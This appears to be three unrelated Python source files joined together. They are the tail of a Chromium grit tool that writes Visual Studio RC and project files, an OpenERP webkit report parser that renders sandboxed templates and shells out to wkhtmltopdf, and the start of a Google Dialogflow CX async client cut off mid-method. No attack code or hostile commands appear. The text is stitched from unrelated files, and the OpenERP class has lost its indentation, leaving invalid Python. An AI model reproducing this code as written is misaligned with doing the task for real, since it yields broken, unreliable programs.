    dir_path = os.path.join(self.base_folder, project_name)
    if not os.path.isdir(dir_path):
      os.mkdir(dir_path)

    # If this fails then we're not on Windows (or you don't have the required
    # win32all Python libraries installed), so what are you doing mucking
    # about with RC files anyway? :)
    import pythoncom

    # Create the .vcproj file
    project_text = PROJECT_TEMPLATE.replace(
      '[[PROJECT_GUID]]', str(pythoncom.CreateGuid())
      ).replace('[[DIALOG_NAME]]', project_name)
    fname = os.path.join(dir_path, '%s.vcproj' % project_name)
    self.WriteFile(fname, project_text)
    print "Wrote %s" % fname

    # Create the .rc file
    # Output all <include> nodes since the dialogs might depend on them (e.g.
    # for icons and bitmaps).
    include_items = []
    for node in grd:
      if isinstance(node, include.IncludeNode):
        formatter = node.ItemFormatter('rc_all')
        if formatter:
          include_items.append(formatter.Format(node, self.lang))
    rc_text = RC_TEMPLATE.replace('[[CODEPAGE_NUM]]',
                                  str(self.codepage_number))
    rc_text = rc_text.replace('[[INCLUDES]]', ''.join(include_items))

    # Then output the dialogs we have been asked to output.
    dialogs = []
    for dialog_id in dialog_ids:
      node = grd.GetNodeById(dialog_id)
      # TODO(joi) Add exception handling for better error reporting
      formatter = node.ItemFormatter('rc_all')
      dialogs.append(formatter.Format(node, self.lang))
    rc_text = rc_text.replace('[[DIALOGS]]', ''.join(dialogs))

    fname = os.path.join(dir_path, '%s.rc' % project_name)
    # The RC file is written in the encoding implied by the codepage, so the
    # #pragma code_page() in the file matches the bytes on disk.
    self.WriteFile(fname, rc_text, self.GetEncoding())
    print "Wrote %s" % fname

    # Create the resource.h file
    header_defines = []
    for node in grd:
      formatter = node.ItemFormatter('rc_header')
      if formatter and not isinstance(formatter, rc_header.TopLevel):
        header_defines.append(formatter.Format(node, self.lang))
    header_text = HEADER_TEMPLATE.replace('[[DEFINES]]', ''.join(header_defines))
    fname = os.path.join(dir_path, 'resource.h')
    self.WriteFile(fname, header_text)
    print "Wrote %s" % fname

  def WriteFile(self, filename, contents, encoding='cp1252'):
    '''Writes 'contents' to 'filename', encoding it with 'encoding'.'''
    f = util.WrapOutputStream(file(filename, 'wb'), encoding)
    f.write(contents)
    f.close()
| |
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2010 Camptocamp SA (http://www.camptocamp.com)
# All Right Reserved
#
# Author : Nicolas Bessi (Camptocamp)
# Contributor(s) : Florent Xicluna (Wingo SA)
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsibility of assessing all potential
# consequences resulting from its eventual inadequacies and bugs.
# End users who are looking for a ready-to-use solution with commercial
# guarantees and support are strongly advised to contract a Free Software
# Service Company.
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
##############################################################################
import subprocess
import os
import sys
from openerp import report
import tempfile
import time
import logging
from functools import partial
from report_helper import WebKitHelper
import openerp
from openerp.modules.module import get_module_resource
from openerp.report.report_sxw import *
from openerp import tools
from openerp.tools.translate import _
from openerp.osv.osv import except_osv
from urllib import urlencode, quote as quote
_logger = logging.getLogger(__name__)
try:
    # We use a jinja2 sandboxed environment to render mako templates.
    # Note that the rendering does not cover all the mako syntax, in particular
    # arbitrary Python statements are not accepted, and not all expressions are
    # allowed: only "public" attributes (not starting with '_') of objects may
    # be accessed.
    # This is done on purpose: it prevents incidental or malicious execution of
    # Python code that may break the security of the server.
    from jinja2.sandbox import SandboxedEnvironment
    # The delimiters are remapped so that the jinja2 environment accepts
    # mako-style syntax: <% %> blocks, ${ } expressions, <%doc> comments
    # and %-prefixed statement lines.
    mako_template_env = SandboxedEnvironment(
        block_start_string="<%",
        block_end_string="%>",
        variable_start_string="${",
        variable_end_string="}",
        comment_start_string="<%doc>",
        comment_end_string="</%doc>",
        line_statement_prefix="%",
        line_comment_prefix="##",
        trim_blocks=True,               # do not output newline after blocks
        autoescape=True,                # XML/HTML automatic escaping
    )
    mako_template_env.globals.update({
        'str': str,
        'quote': quote,
        'urlencode': urlencode,
    })
except ImportError:
    # mako_template_env is left undefined in this case, so mako_template()
    # below will raise NameError if templating is attempted anyway.
    _logger.warning("jinja2 not available, templating features will not work!")
def mako_template(text):
    """Compile ``text`` into a template object.

    The template is built with the sandboxed, mako-flavoured jinja2
    environment configured above; the source is expected to be UTF-8 text.
    """
    template = mako_template_env.from_string(text)
    return template
_extender_functions = {}
def webkit_report_extender(report_name):
    """
    A decorator to register functions that extend the context used to render
    a report template.  ``report_name`` must be the xml id of the desired
    report (the module part of that xml id is mandatory).

    Each registered function is called when the report is created, with the
    following positional arguments:
      - pool          the model pool
      - cr            the cursor
      - uid           the user id
      - localcontext  the context handed to the template engine for the
                      current report; this is the one to modify
      - context       the OpenERP context
    """
    def register(fct):
        # Append to (creating on first use) the extender list of this report.
        _extender_functions.setdefault(report_name, []).append(fct)
        return fct
    return register
class WebKitParser(report_sxw):
"""Custom class that use webkit to render HTML reports
Code partially taken from report openoffice. Thanks guys :)
"""
def __init__(self, name, table, rml=False, parser=rml_parse,
header=True, store=False, register=True):
self.localcontext = {}
report_sxw.__init__(self, name, table, rml, parser,
header, store, register=register)
def get_lib(self, cursor, uid):
"""Return the lib wkhtml path"""
proxy = self.pool['ir.config_parameter']
webkit_path = proxy.get_param(cursor, uid, 'webkit_path')
if not webkit_path:
try:
defpath = os.environ.get('PATH', os.defpath).split(os.pathsep)
if hasattr(sys, 'frozen'):
defpath.append(os.getcwd())
if tools.config['root_path']:
defpath.append(os.path.dirname(tools.config['root_path']))
webkit_path = tools.which('wkhtmltopdf', path=os.pathsep.join(defpath))
except IOError:
webkit_path = None
if webkit_path:
return webkit_path
raise except_osv(
_('Wkhtmltopdf library path is not set'),
_('Please install executable on your system' \
' (sudo apt-get install wkhtmltopdf) or download it from here:' \
' http://code.google.com/p/wkhtmltopdf/downloads/list and set the' \
' path in the ir.config_parameter with the webkit_path key.' \
'Minimal version is 0.9.9')
)
def generate_pdf(self, comm_path, report_xml, header, footer, html_list, webkit_header=False):
"""Call webkit in order to generate pdf"""
if not webkit_header:
webkit_header = report_xml.webkit_header
fd, out_filename = tempfile.mkstemp(suffix=".pdf",
prefix="webkit.tmp.")
file_to_del = [out_filename]
if comm_path:
command = [comm_path]
else:
command = ['wkhtmltopdf']
command.append('--quiet')
# default to UTF-8 encoding. Use <meta charset="latin-1"> to override.
command.extend(['--encoding', 'utf-8'])
if header :
with tempfile.NamedTemporaryFile(suffix=".head.html",
delete=False) as head_file:
head_file.write(self._sanitize_html(header.encode('utf-8')))
file_to_del.append(head_file.name)
command.extend(['--header-html', head_file.name])
if footer :
with tempfile.NamedTemporaryFile(suffix=".foot.html",
delete=False) as foot_file:
foot_file.write(self._sanitize_html(footer.encode('utf-8')))
file_to_del.append(foot_file.name)
command.extend(['--footer-html', foot_file.name])
if webkit_header.margin_top :
command.extend(['--margin-top', str(webkit_header.margin_top).replace(',', '.')])
if webkit_header.margin_bottom :
command.extend(['--margin-bottom', str(webkit_header.margin_bottom).replace(',', '.')])
if webkit_header.margin_left :
command.extend(['--margin-left', str(webkit_header.margin_left).replace(',', '.')])
if webkit_header.margin_right :
command.extend(['--margin-right', str(webkit_header.margin_right).replace(',', '.')])
if webkit_header.orientation :
command.extend(['--orientation', str(webkit_header.orientation).replace(',', '.')])
if webkit_header.format :
command.extend(['--page-size', str(webkit_header.format).replace(',', '.')])
count = 0
for html in html_list :
with tempfile.NamedTemporaryFile(suffix="%d.body.html" %count,
delete=False) as html_file:
count += 1
html_file.write(self._sanitize_html(html.encode('utf-8')))
file_to_del.append(html_file.name)
command.append(html_file.name)
command.append(out_filename)
stderr_fd, stderr_path = tempfile.mkstemp(text=True)
file_to_del.append(stderr_path)
try:
status = subprocess.call(command, stderr=stderr_fd)
os.close(stderr_fd) # ensure flush before reading
stderr_fd = None # avoid closing again in finally block
fobj = open(stderr_path, 'r')
error_message = fobj.read()
fobj.close()
if not error_message:
error_message = _('No diagnosis message was provided')
else:
error_message = _('The following diagnosis message was provided:\n') + error_message
if status :
raise except_osv(_('Webkit error' ),
_("The command 'wkhtmltopdf' failed with error code = %s. Message: %s") % (status, error_message))
with open(out_filename, 'rb') as pdf_file:
pdf = pdf_file.read()
os.close(fd)
finally:
if stderr_fd is not None:
os.close(stderr_fd)
for f_to_del in file_to_del:
try:
os.unlink(f_to_del)
except (OSError, IOError), exc:
_logger.error('cannot remove file %s: %s', f_to_del, exc)
return pdf
def translate_call(self, parser_instance, src):
"""Translate String."""
ir_translation = self.pool['ir.translation']
name = self.tmpl and 'addons/' + self.tmpl or None
res = ir_translation._get_source(parser_instance.cr, parser_instance.uid,
name, 'report', parser_instance.localcontext.get('lang', 'en_US'), src)
if res == src:
# no translation defined, fallback on None (backward compatibility)
res = ir_translation._get_source(parser_instance.cr, parser_instance.uid,
None, 'report', parser_instance.localcontext.get('lang', 'en_US'), src)
if not res :
return src
return res
# override needed to keep the attachments storing procedure
def create_single_pdf(self, cursor, uid, ids, data, report_xml, context=None):
"""generate the PDF"""
# just try to find an xml id for the report
cr = cursor
pool = openerp.registry(cr.dbname)
found_xml_ids = pool["ir.model.data"].search(cr, uid, [["model", "=", "ir.actions.report.xml"], \
["res_id", "=", report_xml.id]], context=context)
xml_id = None
if found_xml_ids:
xml_id = pool["ir.model.data"].read(cr, uid, found_xml_ids[0], ["module", "name"])
xml_id = "%s.%s" % (xml_id["module"], xml_id["name"])
if context is None:
context={}
htmls = []
if report_xml.report_type != 'webkit':
return super(WebKitParser,self).create_single_pdf(cursor, uid, ids, data, report_xml, context=context)
parser_instance = self.parser(cursor,
uid,
self.name2,
context=context)
self.pool = pool
objs = self.getObjects(cursor, uid, ids, context)
parser_instance.set_context(objs, data, ids, report_xml.report_type)
template = False
if report_xml.report_file :
path = get_module_resource(*report_xml.report_file.split('/'))
if path and os.path.exists(path) :
template = file(path).read()
if not template and report_xml.report_webkit_data :
template = report_xml.report_webkit_data
if not template :
raise except_osv(_('Error!'), _('Webkit report template not found!'))
header = report_xml.webkit_header.html
footer = report_xml.webkit_header.footer_html
if not header and report_xml.use_global_header:
raise except_osv(
_('No header defined for this Webkit report!'),
_('Please set a header in company settings.')
)
if not report_xml.use_global_header :
header = ''
default_head = get_module_resource('report_webkit', 'default_header.html')
with open(default_head,'r') as f:
header = f.read()
css = report_xml.webkit_header.css
if not css :
css = ''
translate_call = partial(self.translate_call, parser_instance)
body_mako_tpl = mako_template(template)
helper = WebKitHelper(cursor, uid, report_xml.id, context)
parser_instance.localcontext['helper'] = helper
parser_instance.localcontext['css'] = css
parser_instance.localcontext['_'] = translate_call
# apply extender functions
additional = {}
if xml_id in _extender_functions:
for fct in _extender_functions[xml_id]:
fct(pool, cr, uid, parser_instance.localcontext, context)
if report_xml.precise_mode:
ctx = dict(parser_instance.localcontext)
for obj in parser_instance.localcontext['objects']:
ctx['objects'] = [obj]
try :
html = body_mako_tpl.render(dict(ctx))
htmls.append(html)
except Exception, e:
msg = u"%s" % e
_logger.error(msg)
raise except_osv(_('Webkit render!'), msg)
else:
try :
html = body_mako_tpl.render(dict(parser_instance.localcontext))
htmls.append(html)
except Exception, e:
msg = u"%s" % e
_logger.error(msg)
raise except_osv(_('Webkit render!'), msg)
head_mako_tpl = mako_template(header)
try :
head = head_mako_tpl.render(dict(parser_instance.localcontext, _debug=False))
except Exception, e:
raise except_osv(_('Webkit render!'), u"%s" % e)
foot = False
if footer :
foot_mako_tpl = mako_template(footer)
try :
foot = foot_mako_tpl.render(dict(parser_instance.localcontext))
except Exception, e:
msg = u"%s" % e
_logger.error(msg)
raise except_osv(_('Webkit render!'), msg)
if report_xml.webkit_debug :
try :
deb = head_mako_tpl.render(dict(parser_instance.localcontext, _debug=tools.ustr("\n".join(htmls))))
except Exception, e:
msg = u"%s" % e
_logger.error(msg)
raise except_osv(_('Webkit render!'), msg)
return (deb, 'html')
bin = self.get_lib(cursor, uid)
pdf = self.generate_pdf(bin, report_xml, head, foot, htmls)
return (pdf, 'pdf')
def create(self, cursor, uid, ids, data, context=None):
    """Entry point of report generation; routes webkit reports.

    Overrides the standard ``create`` so that reports registered with
    ``report_type == 'webkit'`` are rendered through the webkit engine,
    while anything else is delegated to the parent implementation.
    Lookup logic borrowed from the OpenOffice report engine.
    """
    registry = openerp.registry(cursor.dbname)
    report_model = registry['ir.actions.report.xml']
    matching_ids = report_model.search(
        cursor, uid,
        [('report_name', '=', self.name[7:])], context=context)
    # No matching ir.actions.report.xml record: let the parent handle it.
    if not matching_ids:
        return super(WebKitParser, self).create(cursor, uid, ids, data, context)
    report_xml = report_model.browse(cursor, uid, matching_ids[0], context=context)
    # Propagate the parser-level header flag onto the browse record so the
    # rendering code can read it as ``use_global_header``.
    setattr(report_xml, 'use_global_header', self.header if report_xml.header else False)
    if report_xml.report_type != 'webkit':
        return super(WebKitParser, self).create(cursor, uid, ids, data, context)
    result = self.create_source_pdf(cursor, uid, ids, data, report_xml, context)
    if not result:
        return (False, False)
    return result
def _sanitize_html(self, html):
"""wkhtmltopdf expects the html page to declare a doctype.
"""
if html and html[:9].upper() != "<!DOCTYPE":
html = "<!DOCTYPE html>\n" + html
return html
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| |
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
import functools
import re
from typing import Dict, Optional, Sequence, Tuple, Type, Union
import pkg_resources
from google.api_core.client_options import ClientOptions
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import retry as retries
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
try:
OptionalRetry = Union[retries.Retry, gapic_v1.method._MethodDefault]
except AttributeError: # pragma: NO COVER
OptionalRetry = Union[retries.Retry, object] # type: ignore
from google.cloud.dialogflowcx_v3beta1.services.session_entity_types import pagers
from google.cloud.dialogflowcx_v3beta1.types import entity_type
from google.cloud.dialogflowcx_v3beta1.types import session_entity_type
from google.cloud.dialogflowcx_v3beta1.types import (
session_entity_type as gcdc_session_entity_type,
)
from google.protobuf import field_mask_pb2 # type: ignore
from .transports.base import SessionEntityTypesTransport, DEFAULT_CLIENT_INFO
from .transports.grpc_asyncio import SessionEntityTypesGrpcAsyncIOTransport
from .client import SessionEntityTypesClient
class SessionEntityTypesAsyncClient:
    """Service for managing
    [SessionEntityTypes][google.cloud.dialogflow.cx.v3beta1.SessionEntityType].
    """

    # Underlying synchronous client; all path helpers and endpoint logic
    # are delegated to it.
    _client: SessionEntityTypesClient

    DEFAULT_ENDPOINT = SessionEntityTypesClient.DEFAULT_ENDPOINT
    DEFAULT_MTLS_ENDPOINT = SessionEntityTypesClient.DEFAULT_MTLS_ENDPOINT

    session_entity_type_path = staticmethod(
        SessionEntityTypesClient.session_entity_type_path
    )
    parse_session_entity_type_path = staticmethod(
        SessionEntityTypesClient.parse_session_entity_type_path
    )
    common_billing_account_path = staticmethod(
        SessionEntityTypesClient.common_billing_account_path
    )
    parse_common_billing_account_path = staticmethod(
        SessionEntityTypesClient.parse_common_billing_account_path
    )
    common_folder_path = staticmethod(SessionEntityTypesClient.common_folder_path)
    parse_common_folder_path = staticmethod(
        SessionEntityTypesClient.parse_common_folder_path
    )
    common_organization_path = staticmethod(
        SessionEntityTypesClient.common_organization_path
    )
    parse_common_organization_path = staticmethod(
        SessionEntityTypesClient.parse_common_organization_path
    )
    common_project_path = staticmethod(SessionEntityTypesClient.common_project_path)
    parse_common_project_path = staticmethod(
        SessionEntityTypesClient.parse_common_project_path
    )
    common_location_path = staticmethod(SessionEntityTypesClient.common_location_path)
    parse_common_location_path = staticmethod(
        SessionEntityTypesClient.parse_common_location_path
    )

    @classmethod
    def from_service_account_info(cls, info: dict, *args, **kwargs):
        """Creates an instance of this client using the provided credentials
            info.

        Args:
            info (dict): The service account private key info.
            args: Additional arguments to pass to the constructor.
            kwargs: Additional arguments to pass to the constructor.

        Returns:
            SessionEntityTypesAsyncClient: The constructed client.
        """
        return SessionEntityTypesClient.from_service_account_info.__func__(SessionEntityTypesAsyncClient, info, *args, **kwargs)  # type: ignore

    @classmethod
    def from_service_account_file(cls, filename: str, *args, **kwargs):
        """Creates an instance of this client using the provided credentials
            file.

        Args:
            filename (str): The path to the service account private key json
                file.
            args: Additional arguments to pass to the constructor.
            kwargs: Additional arguments to pass to the constructor.

        Returns:
            SessionEntityTypesAsyncClient: The constructed client.
        """
        return SessionEntityTypesClient.from_service_account_file.__func__(SessionEntityTypesAsyncClient, filename, *args, **kwargs)  # type: ignore

    from_service_account_json = from_service_account_file

    @classmethod
    def get_mtls_endpoint_and_cert_source(
        cls, client_options: Optional[ClientOptions] = None
    ):
        """Return the API endpoint and client cert source for mutual TLS.

        The client cert source is determined in the following order:
        (1) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is not "true", the
        client cert source is None.
        (2) if `client_options.client_cert_source` is provided, use the provided one; if the
        default client cert source exists, use the default one; otherwise the client cert
        source is None.

        The API endpoint is determined in the following order:
        (1) if `client_options.api_endpoint` is provided, use the provided one.
        (2) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is "always", use the
        default mTLS endpoint; if the environment variable is "never", use the default API
        endpoint; otherwise if client cert source exists, use the default mTLS endpoint, otherwise
        use the default API endpoint.

        More details can be found at https://google.aip.dev/auth/4114.

        Args:
            client_options (google.api_core.client_options.ClientOptions): Custom options for the
                client. Only the `api_endpoint` and `client_cert_source` properties may be used
                in this method.

        Returns:
            Tuple[str, Callable[[], Tuple[bytes, bytes]]]: returns the API endpoint and the
                client cert source to use.

        Raises:
            google.auth.exceptions.MutualTLSChannelError: If any errors happen.
        """
        return SessionEntityTypesClient.get_mtls_endpoint_and_cert_source(client_options)  # type: ignore

    @property
    def transport(self) -> SessionEntityTypesTransport:
        """Returns the transport used by the client instance.

        Returns:
            SessionEntityTypesTransport: The transport used by the client instance.
        """
        return self._client.transport

    get_transport_class = functools.partial(
        type(SessionEntityTypesClient).get_transport_class,
        type(SessionEntityTypesClient),
    )

    def __init__(
        self,
        *,
        credentials: Optional[ga_credentials.Credentials] = None,
        transport: Union[str, SessionEntityTypesTransport] = "grpc_asyncio",
        client_options: Optional[ClientOptions] = None,
        client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
    ) -> None:
        """Instantiates the session entity types client.

        Args:
            credentials (Optional[google.auth.credentials.Credentials]): The
                authorization credentials to attach to requests. These
                credentials identify the application to the service; if none
                are specified, the client will attempt to ascertain the
                credentials from the environment.
            transport (Union[str, ~.SessionEntityTypesTransport]): The
                transport to use. If set to None, a transport is chosen
                automatically.
            client_options (ClientOptions): Custom options for the client. It
                won't take effect if a ``transport`` instance is provided.
                (1) The ``api_endpoint`` property can be used to override the
                default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
                environment variable can also be used to override the endpoint:
                "always" (always use the default mTLS endpoint), "never" (always
                use the default regular endpoint) and "auto" (auto switch to the
                default mTLS endpoint if client certificate is present, this is
                the default value). However, the ``api_endpoint`` property takes
                precedence if provided.
                (2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
                is "true", then the ``client_cert_source`` property can be used
                to provide client certificate for mutual TLS transport. If
                not provided, the default SSL client certificate will be used if
                present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
                set, no client certificate will be used.

        Raises:
            google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
                creation failed for any reason.
        """
        self._client = SessionEntityTypesClient(
            credentials=credentials,
            transport=transport,
            client_options=client_options,
            client_info=client_info,
        )

    async def list_session_entity_types(
        self,
        request: Optional[Union[session_entity_type.ListSessionEntityTypesRequest, dict]] = None,
        *,
        parent: Optional[str] = None,
        retry: OptionalRetry = gapic_v1.method.DEFAULT,
        timeout: Optional[float] = None,
        metadata: Sequence[Tuple[str, str]] = (),
    ) -> pagers.ListSessionEntityTypesAsyncPager:
        r"""Returns the list of all session entity types in the
        specified session.

        .. code-block:: python

            from google.cloud import dialogflowcx_v3beta1

            def sample_list_session_entity_types():
                # Create a client
                client = dialogflowcx_v3beta1.SessionEntityTypesClient()

                # Initialize request argument(s)
                request = dialogflowcx_v3beta1.ListSessionEntityTypesRequest(
                    parent="parent_value",
                )

                # Make the request
                page_result = client.list_session_entity_types(request=request)

                # Handle the response
                for response in page_result:
                    print(response)

        Args:
            request (Union[google.cloud.dialogflowcx_v3beta1.types.ListSessionEntityTypesRequest, dict]):
                The request object. The request message for
                [SessionEntityTypes.ListSessionEntityTypes][google.cloud.dialogflow.cx.v3beta1.SessionEntityTypes.ListSessionEntityTypes].
            parent (:class:`str`):
                Required. The session to list all session entity types
                from. Format:
                ``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/sessions/<Session ID>``
                or
                ``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/environments/<Environment ID>/sessions/<Session ID>``.
                If ``Environment ID`` is not specified, we assume
                default 'draft' environment.

                This corresponds to the ``parent`` field
                on the ``request`` instance; if ``request`` is provided, this
                should not be set.
            retry (google.api_core.retry.Retry): Designation of what errors, if any,
                should be retried.
            timeout (float): The timeout for this request.
            metadata (Sequence[Tuple[str, str]]): Strings which should be
                sent along with the request as metadata.

        Returns:
            google.cloud.dialogflowcx_v3beta1.services.session_entity_types.pagers.ListSessionEntityTypesAsyncPager:
                The response message for
                [SessionEntityTypes.ListSessionEntityTypes][google.cloud.dialogflow.cx.v3beta1.SessionEntityTypes.ListSessionEntityTypes].

                Iterating over this object will yield results and
                resolve additional pages automatically.

        """
        # Create or coerce a protobuf request object.
        # Quick check: If we got a request object, we should *not* have
        # gotten any keyword arguments that map to the request.
        has_flattened_params = any([parent])
        if request is not None and has_flattened_params:
            raise ValueError(
                "If the `request` argument is set, then none of "
                "the individual field arguments should be set."
            )

        request = session_entity_type.ListSessionEntityTypesRequest(request)

        # If we have keyword arguments corresponding to fields on the
        # request, apply these.
        if parent is not None:
            request.parent = parent

        # Wrap the RPC method; this adds retry and timeout information,
        # and friendly error handling.
        rpc = gapic_v1.method_async.wrap_method(
            self._client._transport.list_session_entity_types,
            default_timeout=None,
            client_info=DEFAULT_CLIENT_INFO,
        )

        # Certain fields should be provided within the metadata header;
        # add these here.
        metadata = tuple(metadata) + (
            gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
        )

        # Send the request.
        response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)

        # This method is paged; wrap the response in a pager, which provides
        # an `__aiter__` convenience method.
        response = pagers.ListSessionEntityTypesAsyncPager(
            method=rpc, request=request, response=response, metadata=metadata,
        )

        # Done; return the response.
        return response

    async def get_session_entity_type(
        self,
        request: Optional[Union[session_entity_type.GetSessionEntityTypeRequest, dict]] = None,
        *,
        name: Optional[str] = None,
        retry: OptionalRetry = gapic_v1.method.DEFAULT,
        timeout: Optional[float] = None,
        metadata: Sequence[Tuple[str, str]] = (),
    ) -> session_entity_type.SessionEntityType:
        r"""Retrieves the specified session entity type.

        .. code-block:: python

            from google.cloud import dialogflowcx_v3beta1

            def sample_get_session_entity_type():
                # Create a client
                client = dialogflowcx_v3beta1.SessionEntityTypesClient()

                # Initialize request argument(s)
                request = dialogflowcx_v3beta1.GetSessionEntityTypeRequest(
                    name="name_value",
                )

                # Make the request
                response = client.get_session_entity_type(request=request)

                # Handle the response
                print(response)

        Args:
            request (Union[google.cloud.dialogflowcx_v3beta1.types.GetSessionEntityTypeRequest, dict]):
                The request object. The request message for
                [SessionEntityTypes.GetSessionEntityType][google.cloud.dialogflow.cx.v3beta1.SessionEntityTypes.GetSessionEntityType].
            name (:class:`str`):
                Required. The name of the session entity type. Format:
                ``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/sessions/<Session ID>/entityTypes/<Entity Type ID>``
                or
                ``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/environments/<Environment ID>/sessions/<Session ID>/entityTypes/<Entity Type ID>``.
                If ``Environment ID`` is not specified, we assume
                default 'draft' environment.

                This corresponds to the ``name`` field
                on the ``request`` instance; if ``request`` is provided, this
                should not be set.
            retry (google.api_core.retry.Retry): Designation of what errors, if any,
                should be retried.
            timeout (float): The timeout for this request.
            metadata (Sequence[Tuple[str, str]]): Strings which should be
                sent along with the request as metadata.

        Returns:
            google.cloud.dialogflowcx_v3beta1.types.SessionEntityType:
                Session entity types are referred to as **User** entity types and are
                   entities that are built for an individual user such
                   as favorites, preferences, playlists, and so on.

                   You can redefine a session entity type at the session
                   level to extend or replace a [custom entity
                   type][google.cloud.dialogflow.cx.v3beta1.EntityType]
                   at the user session level (we refer to the entity
                   types defined at the agent level as "custom entity
                   types").

                   Note: session entity types apply to all queries,
                   regardless of the language.

                   For more information about entity types, see the
                   [Dialogflow
                   documentation](\ https://cloud.google.com/dialogflow/docs/entities-overview).

        """
        # Create or coerce a protobuf request object.
        # Quick check: If we got a request object, we should *not* have
        # gotten any keyword arguments that map to the request.
        has_flattened_params = any([name])
        if request is not None and has_flattened_params:
            raise ValueError(
                "If the `request` argument is set, then none of "
                "the individual field arguments should be set."
            )

        request = session_entity_type.GetSessionEntityTypeRequest(request)

        # If we have keyword arguments corresponding to fields on the
        # request, apply these.
        if name is not None:
            request.name = name

        # Wrap the RPC method; this adds retry and timeout information,
        # and friendly error handling.
        rpc = gapic_v1.method_async.wrap_method(
            self._client._transport.get_session_entity_type,
            default_timeout=None,
            client_info=DEFAULT_CLIENT_INFO,
        )

        # Certain fields should be provided within the metadata header;
        # add these here.
        metadata = tuple(metadata) + (
            gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
        )

        # Send the request.
        response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)

        # Done; return the response.
        return response

    async def create_session_entity_type(
        self,
        request: Optional[Union[
            gcdc_session_entity_type.CreateSessionEntityTypeRequest, dict
        ]] = None,
        *,
        parent: Optional[str] = None,
        session_entity_type: Optional[gcdc_session_entity_type.SessionEntityType] = None,
        retry: OptionalRetry = gapic_v1.method.DEFAULT,
        timeout: Optional[float] = None,
        metadata: Sequence[Tuple[str, str]] = (),
    ) -> gcdc_session_entity_type.SessionEntityType:
        r"""Creates a session entity type.

        .. code-block:: python

            from google.cloud import dialogflowcx_v3beta1

            def sample_create_session_entity_type():
                # Create a client
                client = dialogflowcx_v3beta1.SessionEntityTypesClient()

                # Initialize request argument(s)
                session_entity_type = dialogflowcx_v3beta1.SessionEntityType()
                session_entity_type.name = "name_value"
                session_entity_type.entity_override_mode = "ENTITY_OVERRIDE_MODE_SUPPLEMENT"
                session_entity_type.entities.value = "value_value"
                session_entity_type.entities.synonyms = ['synonyms_value_1', 'synonyms_value_2']

                request = dialogflowcx_v3beta1.CreateSessionEntityTypeRequest(
                    parent="parent_value",
                    session_entity_type=session_entity_type,
                )

                # Make the request
                response = client.create_session_entity_type(request=request)

                # Handle the response
                print(response)

        Args:
            request (Union[google.cloud.dialogflowcx_v3beta1.types.CreateSessionEntityTypeRequest, dict]):
                The request object. The request message for
                [SessionEntityTypes.CreateSessionEntityType][google.cloud.dialogflow.cx.v3beta1.SessionEntityTypes.CreateSessionEntityType].
            parent (:class:`str`):
                Required. The session to create a session entity type
                for. Format:
                ``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/sessions/<Session ID>``
                or
                ``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/environments/<Environment ID>/sessions/<Session ID>``.
                If ``Environment ID`` is not specified, we assume
                default 'draft' environment.

                This corresponds to the ``parent`` field
                on the ``request`` instance; if ``request`` is provided, this
                should not be set.
            session_entity_type (:class:`google.cloud.dialogflowcx_v3beta1.types.SessionEntityType`):
                Required. The session entity type to
                create.

                This corresponds to the ``session_entity_type`` field
                on the ``request`` instance; if ``request`` is provided, this
                should not be set.
            retry (google.api_core.retry.Retry): Designation of what errors, if any,
                should be retried.
            timeout (float): The timeout for this request.
            metadata (Sequence[Tuple[str, str]]): Strings which should be
                sent along with the request as metadata.

        Returns:
            google.cloud.dialogflowcx_v3beta1.types.SessionEntityType:
                Session entity types are referred to as **User** entity types and are
                   entities that are built for an individual user such
                   as favorites, preferences, playlists, and so on.

                   You can redefine a session entity type at the session
                   level to extend or replace a [custom entity
                   type][google.cloud.dialogflow.cx.v3beta1.EntityType]
                   at the user session level (we refer to the entity
                   types defined at the agent level as "custom entity
                   types").

                   Note: session entity types apply to all queries,
                   regardless of the language.

                   For more information about entity types, see the
                   [Dialogflow
                   documentation](\ https://cloud.google.com/dialogflow/docs/entities-overview).

        """
        # Create or coerce a protobuf request object.
        # Quick check: If we got a request object, we should *not* have
        # gotten any keyword arguments that map to the request.
        has_flattened_params = any([parent, session_entity_type])
        if request is not None and has_flattened_params:
            raise ValueError(
                "If the `request` argument is set, then none of "
                "the individual field arguments should be set."
            )

        request = gcdc_session_entity_type.CreateSessionEntityTypeRequest(request)

        # If we have keyword arguments corresponding to fields on the
        # request, apply these.
        if parent is not None:
            request.parent = parent
        if session_entity_type is not None:
